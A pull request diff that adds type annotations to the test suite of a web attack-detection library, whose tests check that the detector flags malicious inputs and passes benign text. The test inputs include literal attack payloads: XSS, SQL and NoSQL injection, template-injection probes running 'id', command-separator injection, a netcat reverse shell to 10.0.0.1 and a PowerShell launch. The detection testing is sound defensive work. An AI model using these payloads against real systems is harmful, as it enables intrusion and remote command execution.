### PR TITLE
Clear pre-existing gate mypy debt in tests/ + unasync generator

### DIFF
--- a/scripts/unasync.py
+++ b/scripts/unasync.py
@@ -223,7 +223,10 @@ POST_FIXUPS: list[tuple[str, str]] = [
         '                    reason=f"Geographic lookup failed: {str(e)}",\n'
         "                )",
     ),
-    (r"list\(\(([^,]+\(\),\s*[^,]+\(\)),\s*return_exceptions=True\)", r"[\1]"),
+    (
+        r"(\s+)list\(\(([^,]+\(\)),\s*([^,]+\(\)),\s*return_exceptions=True\)",
+        r"\1\2\n\1\3",
+    ),
     (
         r"            try:\n                self\.update_task\n            except Exception:\n                pass",  # noqa: E501
         "            pass",

--- a/tests/attack_simulation/test_attack_simulation.py
+++ b/tests/attack_simulation/test_attack_simulation.py
@@ -10,7 +10,7 @@ _TOLERANCE = 0.02
 
 
 @pytest.mark.asyncio
-async def test_detection_does_not_regress_against_baseline():
+async def test_detection_does_not_regress_against_baseline() -> None:
     baseline = json.loads((_BASE / "baseline.json").read_text())
     report = await run_benchmark(_BASE / "corpus")
     assert report["detection_rate"] >= baseline["detection_rate"] - _TOLERANCE

--- a/tests/attack_simulation/test_harness.py
+++ b/tests/attack_simulation/test_harness.py
@@ -12,18 +12,18 @@ from tests.attack_simulation.runner import build_detection_config
 CORPUS = Path(__file__).parent / "corpus"
 
 
-def test_summarize_config_extracts_detection_fields():
+def test_summarize_config_extracts_detection_fields() -> None:
     summary = summarize_config(build_detection_config())
     assert summary["detection_compiler_timeout"] == 2.0
     assert summary["detection_semantic_threshold"] == 0.7
 
 
-def test_fingerprint_is_stable():
+def test_fingerprint_is_stable() -> None:
     assert fingerprint_corpus(CORPUS) == fingerprint_corpus(CORPUS)
 
 
 @pytest.mark.asyncio
-async def test_run_benchmark_produces_report():
+async def test_run_benchmark_produces_report() -> None:
     report = await run_benchmark(CORPUS)
     assert 0.0 <= report["detection_rate"] <= 1.0
     assert 0.0 <= report["fp_rate"] <= 1.0

--- a/tests/attack_simulation/test_loaders.py
+++ b/tests/attack_simulation/test_loaders.py
@@ -10,7 +10,7 @@ from tests.attack_simulation.loaders import (
 CORPUS = Path(__file__).parent / "corpus"
 
 
-def test_load_seeds_parses_payloads_and_provenance():
+def test_load_seeds_parses_payloads_and_provenance() -> None:
     seeds = load_seeds(CORPUS / "seeds")
     assert all(isinstance(seed, Seed) for seed in seeds)
     xss = [seed for seed in seeds if seed.attack_class == "xss"]
@@ -21,7 +21,7 @@ def test_load_seeds_parses_payloads_and_provenance():
     assert all(not seed.payload.startswith("#") for seed in seeds)
 
 
-def test_load_benign_tags_category():
+def test_load_benign_tags_category() -> None:
     benign = load_benign(CORPUS / "benign")
     assert all(isinstance(sample, BenignSample) for sample in benign)
     categories = {sample.category for sample in benign}

--- a/tests/attack_simulation/test_metrics.py
+++ b/tests/attack_simulation/test_metrics.py
@@ -1,15 +1,15 @@
 from tests.attack_simulation.metrics import Result, score
 
 
-def _malicious(detected, attack_class, chain):
+def _malicious(detected: bool, attack_class: str, chain: tuple[str, ...]) -> Result:
     return Result(True, detected, attack_class, chain, None)
 
 
-def _benign(detected, category):
+def _benign(detected: bool, category: str) -> Result:
     return Result(False, detected, None, (), category)
 
 
-def test_score_computes_rates_and_breakdowns():
+def test_score_computes_rates_and_breakdowns() -> None:
     results = [
         _malicious(True, "xss", ()),
         _malicious(False, "xss", ("base64_wrap",)),
@@ -36,7 +36,7 @@ def test_score_computes_rates_and_breakdowns():
     assert out["per_benign_category"]["encoded_legit"] == 0.0
 
 
-def test_score_handles_empty_groups():
+def test_score_handles_empty_groups() -> None:
     out = score([])
     assert out["detection_rate"] == 0.0
     assert out["fp_rate"] == 0.0

--- a/tests/attack_simulation/test_mutations.py
+++ b/tests/attack_simulation/test_mutations.py
@@ -5,7 +5,7 @@ from tests.attack_simulation.mutations import (
 )
 
 
-def test_individual_transforms():
+def test_individual_transforms() -> None:
     assert TRANSFORMS["url_encode"]("<a>") == "%3Ca%3E"
     assert TRANSFORMS["double_url_encode"]("<") == "%253C"
     assert TRANSFORMS["html_entity_decimal"]("<") == "&#60;"
@@ -14,7 +14,7 @@ def test_individual_transforms():
     assert TRANSFORMS["base64_wrap"]("ab") == "YWI="
 
 
-def test_generate_variants_shape_and_metadata():
+def test_generate_variants_shape_and_metadata() -> None:
     variants = list(generate_variants("xss-0", "xss", "<script>"))
     chains = [v.technique_chain for v in variants]
     assert () in chains
@@ -26,7 +26,7 @@ def test_generate_variants_shape_and_metadata():
     assert len(variants) == 1 + len(TRANSFORMS) + 6
 
 
-def test_generate_variants_is_deterministic():
+def test_generate_variants_is_deterministic() -> None:
     a = [v.payload for v in generate_variants("s", "xss", "<x>")]
     b = [v.payload for v in generate_variants("s", "xss", "<x>")]
     assert a == b

--- a/tests/attack_simulation/test_reporter.py
+++ b/tests/attack_simulation/test_reporter.py
@@ -1,9 +1,11 @@
 import json
+from pathlib import Path
+from typing import Any
 
 from tests.attack_simulation.reporter import build_report, write_reports
 
 
-def _metrics():
+def _metrics() -> dict[str, Any]:
     return {
         "detection_rate": 0.9,
         "fp_rate": 0.2,
@@ -22,7 +24,7 @@ def _metrics():
     }
 
 
-def test_build_report_merges_context():
+def test_build_report_merges_context() -> None:
     report = build_report(_metrics(), {"detection_compiler_timeout": 2.0}, 1.23, "abc")
     assert report["detection_rate"] == 0.9
     assert report["config"] == {"detection_compiler_timeout": 2.0}
@@ -30,7 +32,7 @@ def test_build_report_merges_context():
     assert report["corpus_fingerprint"] == "abc"
 
 
-def test_write_reports_emits_json_and_md(tmp_path):
+def test_write_reports_emits_json_and_md(tmp_path: Path) -> None:
     report = build_report(_metrics(), {"detection_compiler_timeout": 2.0}, 1.23, "abc")
     json_path, md_path = write_reports(report, tmp_path)
     loaded = json.loads(json_path.read_text())

--- a/tests/attack_simulation/test_runner.py
+++ b/tests/attack_simulation/test_runner.py
@@ -8,7 +8,7 @@ from tests.attack_simulation.runner import (
 )
 
 
-def test_build_detection_config_activates_preprocessor():
+def test_build_detection_config_activates_preprocessor() -> None:
     config = build_detection_config()
     SusPatternsManager._instance = None
     SusPatternsManager._config = None
@@ -19,18 +19,21 @@ def test_build_detection_config_activates_preprocessor():
 
 
 @pytest.mark.asyncio
-async def test_scan_detects_raw_attack_and_passes_benign():
+async def test_scan_detects_raw_attack_and_passes_benign() -> None:
     async with detection_manager() as manager:
         assert await scan(manager, "<script>alert(1)</script>") is True
         assert await scan(manager, "the quick brown fox jumps over") is False
 
 
 @pytest.mark.asyncio
-async def test_detection_manager_restores_singleton():
-    sentinel = object()
+async def test_detection_manager_restores_singleton() -> None:
+    SusPatternsManager._instance = None
+    SusPatternsManager._config = None
+    sentinel = SusPatternsManager()
     SusPatternsManager._instance = sentinel
     async with detection_manager() as manager:
         assert manager is not sentinel
     assert SusPatternsManager._instance is sentinel
+    await sentinel.reset()
     SusPatternsManager._instance = None
     SusPatternsManager._config = None

--- a/tests/attack_simulation/test_score_payloads.py
+++ b/tests/attack_simulation/test_score_payloads.py
@@ -1,4 +1,5 @@
 import json
+from pathlib import Path
 
 import pytest
 
@@ -6,7 +7,7 @@ from tests.attack_simulation.score_payloads import main, score_payloads
 
 
 @pytest.mark.asyncio
-async def test_score_payloads_flags_malicious_and_benign():
+async def test_score_payloads_flags_malicious_and_benign() -> None:
     results = await score_payloads(
         ["<script>alert(1)</script>", "the quick brown fox jumps"]
     )
@@ -19,7 +20,7 @@ async def test_score_payloads_flags_malicious_and_benign():
     assert all(isinstance(r["threat_score"], float) for r in results)
 
 
-def test_cli_round_trips(tmp_path):
+def test_cli_round_trips(tmp_path: Path) -> None:
     in_path = tmp_path / "in.json"
     out_path = tmp_path / "out.json"
     in_path.write_text(json.dumps(["<script>alert(1)</script>", "hello there"]))

--- a/tests/integration/test_otel_jaeger_integration.py
+++ b/tests/integration/test_otel_jaeger_integration.py
@@ -70,9 +70,11 @@ class _SyntheticEvent:
 
 async def _wait_for_service(ui_url: str, service_name: str) -> None:
     timeout = aiohttp.ClientTimeout(total=10)
-    async with aiohttp.ClientSession(base_url=ui_url, timeout=timeout) as session:
+    async with aiohttp.ClientSession() as session:
         for _ in range(10):
-            async with session.get("/api/services") as response:
+            async with session.get(
+                f"{ui_url}/api/services", timeout=timeout
+            ) as response:
                 payload = await response.json()
             services = payload.get("data") or []
             if service_name in services:
@@ -87,9 +89,11 @@ async def _fetch_penetration_spans(
     ui_url: str, service_name: str
 ) -> list[dict[str, Any]]:
     timeout = aiohttp.ClientTimeout(total=10)
-    async with aiohttp.ClientSession(base_url=ui_url, timeout=timeout) as session:
+    async with aiohttp.ClientSession() as session:
         params = {"service": service_name, "limit": "10", "lookback": "5m"}
-        async with session.get("/api/traces", params=params) as response:
+        async with session.get(
+            f"{ui_url}/api/traces", params=params, timeout=timeout
+        ) as response:
             payload = await response.json()
     data = payload.get("data") or []
     tags_by_span = [

--- a/tests/test_cloud_region_scope.py
+++ b/tests/test_cloud_region_scope.py
@@ -126,7 +126,9 @@ async def test_refresh_populates_network_regions(
 ) -> None:
     net = ipaddress.ip_network("34.100.0.0/24")
 
-    async def fake_gcp() -> tuple[set[ipaddress.IPv4Network], dict[str, str]]:
+    async def fake_gcp() -> tuple[
+        set[ipaddress.IPv4Network | ipaddress.IPv6Network], dict[str, str]
+    ]:
         return {net}, {str(net): "us-central1"}
 
     monkeypatch.setattr(

--- a/tests/test_core/test_route_whitelist_scope.py
+++ b/tests/test_core/test_route_whitelist_scope.py
@@ -106,7 +106,7 @@ async def test_cloud_block_on_route_whitelisted_ip_is_coherent(
     mock_ban_manager.is_ip_banned = AsyncMock(return_value=False)
     cfg = SecurityConfig()
     cfg.passive_mode = False
-    cfg.block_cloud_providers = ["AWS"]
+    cfg.block_cloud_providers = {"AWS"}
     rc = RouteConfig()
     rc.ip_whitelist = ["1.2.3.4"]
     req = _req(rc)

--- a/tests/test_detection_singleton_configuration.py
+++ b/tests/test_detection_singleton_configuration.py
@@ -31,7 +31,8 @@ async def test_initialize_configures_detection_from_config(
 ) -> None:
     handler = fresh_legacy_singleton
     assert handler._threat_score_threshold == 1.0
-    assert handler._compiler is None
+    compiler_before = handler._compiler
+    assert compiler_before is None
 
     config = SecurityConfig(detection_threat_score_threshold=2.5)
     initializer = HandlerInitializer(config=config)

--- a/tests/test_dynamic_rule_atomicity.py
+++ b/tests/test_dynamic_rule_atomicity.py
@@ -29,8 +29,8 @@ def reset_singleton() -> Generator[None, None, None]:
 @pytest.mark.asyncio
 async def test_apply_rules_rolls_back_on_partial_failure() -> None:
     config = SecurityConfig()
-    config.blocked_countries = ["XX"]
-    config.whitelist_countries = ["YY"]
+    config.blocked_countries = frozenset({"XX"})
+    config.whitelist_countries = frozenset({"YY"})
     manager = DynamicRuleManager(config)
 
     rules = _rules(blocked_countries=["NEW"], whitelist_countries=["NEW2"])
@@ -43,8 +43,8 @@ async def test_apply_rules_rolls_back_on_partial_failure() -> None:
         with pytest.raises(RuntimeError, match="kaboom"):
             await manager._apply_rules(rules)
 
-    assert config.blocked_countries == ["XX"]
-    assert config.whitelist_countries == ["YY"]
+    assert config.blocked_countries == frozenset({"XX"})
+    assert config.whitelist_countries == frozenset({"YY"})
 
 
 @pytest.mark.asyncio
@@ -92,7 +92,7 @@ async def test_rollback_restores_all_snapshot_fields() -> None:
         enable_ip_banning=True,
         emergency_mode=False,
     )
-    config.blocked_countries = ["OLD_COUNTRY"]
+    config.blocked_countries = frozenset({"OLD_COUNTRY"})
     manager = DynamicRuleManager(config)
 
     rules = _rules(
@@ -109,7 +109,7 @@ async def test_rollback_restores_all_snapshot_fields() -> None:
         with pytest.raises(RuntimeError):
             await manager._apply_rules(rules)
 
-    assert config.blocked_countries == ["OLD_COUNTRY"]
+    assert config.blocked_countries == frozenset({"OLD_COUNTRY"})
     assert config.rate_limit == 100
     assert config.enable_ip_banning is True
     assert config.emergency_mode is False

--- a/tests/test_models/test_models.py
+++ b/tests/test_models/test_models.py
@@ -78,11 +78,11 @@ class ValidGeoIPHandler:
 def test_geo_ip_handler_validation() -> None:
     ipinfo = IPInfoManager(token="test")
     config = SecurityConfig(geo_ip_handler=ipinfo)
-    assert config.geo_ip_handler == ipinfo
+    assert cast(IPInfoManager, config.geo_ip_handler) is ipinfo
 
     valid_instance = ValidGeoIPHandler()
     config = SecurityConfig(geo_ip_handler=valid_instance)
-    assert config.geo_ip_handler == valid_instance
+    assert cast(ValidGeoIPHandler, config.geo_ip_handler) is valid_instance
 
     config = SecurityConfig(geo_ip_handler=None)
     assert config.geo_ip_handler is None

--- a/tests/test_models/test_security_config_country_lists.py
+++ b/tests/test_models/test_security_config_country_lists.py
@@ -1,3 +1,5 @@
+from pathlib import Path
+
 import pytest
 
 from guard_core.models import SecurityConfig
@@ -15,7 +17,7 @@ def test_whitelist_countries_default_is_empty_frozenset() -> None:
     assert isinstance(config.whitelist_countries, frozenset)
 
 
-def test_blocked_countries_accepts_list_input(tmp_path) -> None:
+def test_blocked_countries_accepts_list_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries=["us", "FR"],
         ipinfo_token="dummy",
@@ -24,7 +26,7 @@ def test_blocked_countries_accepts_list_input(tmp_path) -> None:
     assert config.blocked_countries == frozenset({"US", "FR"})
 
 
-def test_blocked_countries_accepts_set_input(tmp_path) -> None:
+def test_blocked_countries_accepts_set_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries={"us", "fr"},
         ipinfo_token="dummy",
@@ -33,7 +35,7 @@ def test_blocked_countries_accepts_set_input(tmp_path) -> None:
     assert config.blocked_countries == frozenset({"US", "FR"})
 
 
-def test_blocked_countries_accepts_tuple_input(tmp_path) -> None:
+def test_blocked_countries_accepts_tuple_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries=("us", "fr"),
         ipinfo_token="dummy",
@@ -42,7 +44,7 @@ def test_blocked_countries_accepts_tuple_input(tmp_path) -> None:
     assert config.blocked_countries == frozenset({"US", "FR"})
 
 
-def test_blocked_countries_accepts_frozenset_input(tmp_path) -> None:
+def test_blocked_countries_accepts_frozenset_input(tmp_path: Path) -> None:
     config = SecurityConfig(
         blocked_countries=frozenset({"us", "fr"}),
         ipinfo_token="dummy",
@@ -68,7 +70,7 @@ def test_whitelist_countries_none_coerces_to_empty_frozenset() -> None:
     assert isinstance(config.whitelist_countries, frozenset)
 
 
-def test_whitelist_countries_normalizes_case(tmp_path) -> None:
+def test_whitelist_countries_normalizes_case(tmp_path: Path) -> None:
     config = SecurityConfig(
         whitelist_countries=["us", "Gb", "DE"],
         ipinfo_token="dummy",

--- a/tests/test_sus_patterns/test_anomaly_scoring.py
+++ b/tests/test_sus_patterns/test_anomaly_scoring.py
@@ -9,7 +9,7 @@ from guard_core.handlers.suspatterns_handler import (
 from guard_core.models import SecurityConfig
 
 
-def test_threshold_field_default_and_bounds():
+def test_threshold_field_default_and_bounds() -> None:
     assert SecurityConfig().detection_threat_score_threshold == 1.0
     raised = SecurityConfig(detection_threat_score_threshold=2.5)
     assert raised.detection_threat_score_threshold == 2.5
@@ -17,13 +17,15 @@ def test_threshold_field_default_and_bounds():
         SecurityConfig(detection_threat_score_threshold=-1.0)
 
 
-def test_resolve_weight_defaults_to_category_one():
+def test_resolve_weight_defaults_to_category_one() -> None:
     assert _resolve_pattern_weight(r"some-pattern", "sqli") == 1.0
     assert DETECTION_CATEGORY_WEIGHTS["sqli"] == 1.0
 
 
 @pytest.mark.asyncio
-async def test_regex_threat_dict_carries_weight(sus_patterns_manager_with_detection):
+async def test_regex_threat_dict_carries_weight(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     result = await sus_patterns_manager_with_detection.detect(
         "<script>alert(1)</script>", "127.0.0.1", context="unknown"
     )
@@ -34,8 +36,8 @@ async def test_regex_threat_dict_carries_weight(sus_patterns_manager_with_detect
 
 @pytest.mark.asyncio
 async def test_single_match_still_flagged_at_default_threshold(
-    sus_patterns_manager_with_detection,
-):
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     result = await sus_patterns_manager_with_detection.detect(
         "<script>alert(1)</script>", "127.0.0.1", context="unknown"
     )
@@ -44,7 +46,7 @@ async def test_single_match_still_flagged_at_default_threshold(
 
 
 @pytest.mark.asyncio
-async def test_threshold_gate_suppresses_below_threshold():
+async def test_threshold_gate_suppresses_below_threshold() -> None:
     SusPatternsManager._instance = None
     SusPatternsManager._config = None
     config = SecurityConfig(detection_threat_score_threshold=2.0)

--- a/tests/test_sus_patterns/test_fp_reduction.py
+++ b/tests/test_sus_patterns/test_fp_reduction.py
@@ -1,25 +1,33 @@
 import pytest
 
+from guard_core.handlers.suspatterns_handler import SusPatternsManager
 
-async def _flagged(manager, payload: str) -> bool:
+
+async def _flagged(manager: SusPatternsManager, payload: str) -> bool:
     result = await manager.detect(payload, "127.0.0.1", context="unknown")
-    return result["is_threat"]
+    return bool(result["is_threat"])
 
 
 @pytest.mark.asyncio
-async def test_select_star_still_flagged(sus_patterns_manager_with_detection):
+async def test_select_star_still_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _flagged(sus_patterns_manager_with_detection, "SELECT * FROM users")
 
 
 @pytest.mark.asyncio
-async def test_select_where_still_flagged(sus_patterns_manager_with_detection):
+async def test_select_where_still_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _flagged(
         sus_patterns_manager_with_detection, "SELECT password FROM users WHERE id=1"
     )
 
 
 @pytest.mark.asyncio
-async def test_select_prose_not_flagged(sus_patterns_manager_with_detection):
+async def test_select_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _flagged(
         sus_patterns_manager_with_detection,
         "I'll select a few items from the catalog for you",
@@ -27,7 +35,9 @@ async def test_select_prose_not_flagged(sus_patterns_manager_with_detection):
 
 
 @pytest.mark.asyncio
-async def test_select_candidates_prose_not_flagged(sus_patterns_manager_with_detection):
+async def test_select_candidates_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _flagged(
         sus_patterns_manager_with_detection,
         "we will select candidates from the applicant pool",
@@ -35,12 +45,16 @@ async def test_select_candidates_prose_not_flagged(sus_patterns_manager_with_det
 
 
 @pytest.mark.asyncio
-async def test_order_by_attack_flagged(sus_patterns_manager_with_detection):
+async def test_order_by_attack_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _flagged(sus_patterns_manager_with_detection, "1' ORDER BY 1--")
 
 
 @pytest.mark.asyncio
-async def test_order_by_prose_not_flagged(sus_patterns_manager_with_detection):
+async def test_order_by_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _flagged(
         sus_patterns_manager_with_detection,
         "sort the results, order by 1 ascending then by name",
@@ -48,12 +62,16 @@ async def test_order_by_prose_not_flagged(sus_patterns_manager_with_detection):
 
 
 @pytest.mark.asyncio
-async def test_ddl_attack_flagged(sus_patterns_manager_with_detection):
+async def test_ddl_attack_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _flagged(sus_patterns_manager_with_detection, "'; DROP TABLE users;--")
 
 
 @pytest.mark.asyncio
-async def test_ddl_prose_not_flagged(sus_patterns_manager_with_detection):
+async def test_ddl_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _flagged(
         sus_patterns_manager_with_detection,
         "drop table 7 is reserved for the wedding party",
@@ -61,12 +79,16 @@ async def test_ddl_prose_not_flagged(sus_patterns_manager_with_detection):
 
 
 @pytest.mark.asyncio
-async def test_erb_attack_flagged(sus_patterns_manager_with_detection):
+async def test_erb_attack_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _flagged(sus_patterns_manager_with_detection, "<%= 7*7 %>")
 
 
 @pytest.mark.asyncio
-async def test_erb_docs_not_flagged(sus_patterns_manager_with_detection):
+async def test_erb_docs_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _flagged(
         sus_patterns_manager_with_detection,
         "render <%= @user.name %> inside your erb view",
@@ -74,19 +96,25 @@ async def test_erb_docs_not_flagged(sus_patterns_manager_with_detection):
 
 
 @pytest.mark.asyncio
-async def test_nosql_where_op_flagged(sus_patterns_manager_with_detection):
+async def test_nosql_where_op_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _flagged(
         sus_patterns_manager_with_detection, '{"$where": "this.password.length > 0"}'
     )
 
 
 @pytest.mark.asyncio
-async def test_nosql_ne_null_flagged(sus_patterns_manager_with_detection):
+async def test_nosql_ne_null_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _flagged(sus_patterns_manager_with_detection, '{"$ne":null}')
 
 
 @pytest.mark.asyncio
-async def test_nosql_legit_value_not_flagged(sus_patterns_manager_with_detection):
+async def test_nosql_legit_value_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _flagged(
         sus_patterns_manager_with_detection,
         'the mongo filter {"$gt": 5} returns larger values',

--- a/tests/test_sus_patterns/test_phase_b_recall.py
+++ b/tests/test_sus_patterns/test_phase_b_recall.py
@@ -1,39 +1,51 @@
 import pytest
 
+from guard_core.handlers.suspatterns_handler import SusPatternsManager
 
-async def _detected(manager, payload: str) -> bool:
+
+async def _detected(manager: SusPatternsManager, payload: str) -> bool:
     result = await manager.detect(payload, "127.0.0.1", context="unknown")
-    return result["is_threat"]
+    return bool(result["is_threat"])
 
 
 @pytest.mark.asyncio
-async def test_comment_between_keywords_detected(sus_patterns_manager_with_detection):
+async def test_comment_between_keywords_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection, "SELECT/**/FROM/**/users"
     )
 
 
 @pytest.mark.asyncio
-async def test_comment_inside_keyword_detected(sus_patterns_manager_with_detection):
+async def test_comment_inside_keyword_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection, "SEL/**/ECT password FROM users"
     )
 
 
 @pytest.mark.asyncio
-async def test_mysql_version_comment_detected(sus_patterns_manager_with_detection):
+async def test_mysql_version_comment_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection, "1' /*!50000OR*/ '1'='1"
     )
 
 
 @pytest.mark.asyncio
-async def test_quote_flanked_comment_detected(sus_patterns_manager_with_detection):
+async def test_quote_flanked_comment_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, "1'/**/OR/**/'1'='1")
 
 
 @pytest.mark.asyncio
-async def test_benign_css_comment_not_flagged(sus_patterns_manager_with_detection):
+async def test_benign_css_comment_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _detected(
         sus_patterns_manager_with_detection,
         "color: red; /* main theme */ font-size: 14px",
@@ -41,19 +53,25 @@ async def test_benign_css_comment_not_flagged(sus_patterns_manager_with_detectio
 
 
 @pytest.mark.asyncio
-async def test_stacked_ddl_detected(sus_patterns_manager_with_detection):
+async def test_stacked_ddl_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection, "'; DROP TABLE users;--"
     )
 
 
 @pytest.mark.asyncio
-async def test_order_by_enumeration_detected(sus_patterns_manager_with_detection):
+async def test_order_by_enumeration_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, "1' ORDER BY 1--")
 
 
 @pytest.mark.asyncio
-async def test_benign_order_prose_not_flagged(sus_patterns_manager_with_detection):
+async def test_benign_order_prose_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _detected(
         sus_patterns_manager_with_detection,
         "please order by phone or email when you can",
@@ -61,31 +79,39 @@ async def test_benign_order_prose_not_flagged(sus_patterns_manager_with_detectio
 
 
 @pytest.mark.asyncio
-async def test_quoted_nosql_gt_detected(sus_patterns_manager_with_detection):
+async def test_quoted_nosql_gt_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, '{"$gt":""}')
 
 
 @pytest.mark.asyncio
-async def test_quoted_nosql_ne_detected(sus_patterns_manager_with_detection):
+async def test_quoted_nosql_ne_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, '{"$ne":null}')
 
 
 @pytest.mark.asyncio
 async def test_benign_json_dollar_value_not_flagged(
-    sus_patterns_manager_with_detection,
-):
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _detected(
         sus_patterns_manager_with_detection, '{"price":"$25","name":"coffee"}'
     )
 
 
 @pytest.mark.asyncio
-async def test_erb_ssti_detected(sus_patterns_manager_with_detection):
+async def test_erb_ssti_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, "<%= 7*7 %>")
 
 
 @pytest.mark.asyncio
-async def test_ognl_ssti_detected(sus_patterns_manager_with_detection):
+async def test_ognl_ssti_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection,
         "${@java.lang.Runtime@getRuntime().exec('id')}",
@@ -93,52 +119,66 @@ async def test_ognl_ssti_detected(sus_patterns_manager_with_detection):
 
 
 @pytest.mark.asyncio
-async def test_dollar_brace_math_detected(sus_patterns_manager_with_detection):
+async def test_dollar_brace_math_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, "${7*7}")
 
 
 @pytest.mark.asyncio
-async def test_benign_shell_var_not_flagged(sus_patterns_manager_with_detection):
+async def test_benign_shell_var_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _detected(
         sus_patterns_manager_with_detection, "export PATH=${HOME}/bin"
     )
 
 
 @pytest.mark.asyncio
-async def test_netcat_pipe_revshell_detected(sus_patterns_manager_with_detection):
+async def test_netcat_pipe_revshell_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection, "|(nc -e /bin/sh 10.0.0.1 4444)"
     )
 
 
 @pytest.mark.asyncio
-async def test_bare_separator_command_detected(sus_patterns_manager_with_detection):
+async def test_bare_separator_command_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, "test;ls")
 
 
 @pytest.mark.asyncio
 async def test_fullwidth_semicolon_command_detected(
-    sus_patterns_manager_with_detection,
-):
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(sus_patterns_manager_with_detection, "test；ls")
 
 
 @pytest.mark.asyncio
-async def test_benign_semicolon_text_not_flagged(sus_patterns_manager_with_detection):
+async def test_benign_semicolon_text_not_flagged(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert not await _detected(
         sus_patterns_manager_with_detection, "first do this; then enjoy your day"
     )
 
 
 @pytest.mark.asyncio
-async def test_prototype_pollution_detected(sus_patterns_manager_with_detection):
+async def test_prototype_pollution_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection, '{"__proto__":{"isAdmin":true}}'
     )
 
 
 @pytest.mark.asyncio
-async def test_dotnet_process_start_detected(sus_patterns_manager_with_detection):
+async def test_dotnet_process_start_detected(
+    sus_patterns_manager_with_detection: SusPatternsManager,
+) -> None:
     assert await _detected(
         sus_patterns_manager_with_detection,
         'System.Diagnostics.Process.Start("powershell","-c whoami")',

--- a/tests/test_sync/integration/test_otel_jaeger_integration.py
+++ b/tests/test_sync/integration/test_otel_jaeger_integration.py
@@ -70,9 +70,9 @@ class _SyntheticEvent:
 
 def _wait_for_service(ui_url: str, service_name: str) -> None:
     timeout = 10
-    with requests.Session(base_url=ui_url, timeout=timeout) as session:
+    with requests.Session() as session:
         for _ in range(10):
-            with session.get("/api/services") as response:
+            with session.get(f"{ui_url}/api/services", timeout=timeout) as response:
                 payload = response.json()
             services = payload.get("data") or []
             if service_name in services:
@@ -85,9 +85,11 @@ def _wait_for_service(ui_url: str, service_name: str) -> None:
 
 def _fetch_penetration_spans(ui_url: str, service_name: str) -> list[dict[str, Any]]:
     timeout = 10
-    with requests.Session(base_url=ui_url, timeout=timeout) as session:
+    with requests.Session() as session:
         params = {"service": service_name, "limit": "10", "lookback": "5m"}
-        with session.get("/api/traces", params=params) as response:
+        with session.get(
+            f"{ui_url}/api/traces", params=params, timeout=timeout
+        ) as response:
             payload = response.json()
     data = payload.get("data") or []
     tags_by_span = [

--- a/tests/test_sync/test_cloud_region_scope.py
+++ b/tests/test_sync/test_cloud_region_scope.py
@@ -126,7 +126,9 @@ def test_refresh_populates_network_regions(
 ) -> None:
     net = ipaddress.ip_network("34.100.0.0/24")
 
-    def fake_gcp() -> tuple[set[ipaddress.IPv4Network], dict[str, str]]:
+    def fake_gcp() -> tuple[
+        set[ipaddress.IPv4Network | ipaddress.IPv6Network], dict[str, str]
+    ]:
         return {net}, {str(net): "us-central1"}
 
     monkeypatch.setattr(

--- a/tests/test_sync/test_core/test_route_whitelist_scope.py
+++ b/tests/test_sync/test_core/test_route_whitelist_scope.py
@@ -106,7 +106,7 @@ def test_cloud_block_on_route_whitelisted_ip_is_coherent(
